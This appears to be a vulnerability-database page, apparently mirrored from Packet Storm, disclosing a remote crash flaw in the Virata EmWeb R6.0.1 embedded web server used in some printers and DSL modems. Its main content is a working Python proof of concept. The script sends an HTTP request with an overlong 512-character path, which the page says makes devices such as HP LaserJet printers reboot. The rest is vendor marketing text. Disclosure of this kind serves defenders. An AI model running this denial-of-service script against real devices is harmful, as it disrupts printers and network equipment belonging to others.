Lucene search
K

Virata EmWeb R6.0.1 Denial Of Service

🗓️ 07 Apr 2010 00:00:00Reported by Jobert AbmaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 73 Views

Virata EmWeb R6.0.1 Remote Crash Vulnerability, affecting printers and DSL modem

Code
`# Exploit Title: Virata EmWeb R6.0.1 Remote Crash Vulnerability  
# Date: 06/04/10  
# Author: Jobert Abma (Online 24)  
# Email: j.abma[at]online24[dot]nl  
# Version: R6.0.1  
# Tested on: linux  
# CVE :()  
# Code :  
  
# This was written for educational purpose. Use it at your own risk.  
# Author will be not responsible for any damage.  
  
- Exploit -  
  
The Virata EmWeb software is embedded in multiple printers and DSL modems. For  
example the HP Color LaserJet 2800-series. When sending a long header (long   
filename), the printer will reboot. Other soft- and hardware isn't tested yet.  
  
- POC -  
  
#!/usr/bin/python  
  
import socket  
  
host = '192.168.1.110'  
port = 80  
header = 'GET /' + ('A'*512) + ' HTTP/1.0\r\nHost: ' + host + '\r\nConnection: Close\r\n\r\n'  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
  
print 'Sending header...'  
  
s.send(header)  
  
print 'Done!'  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation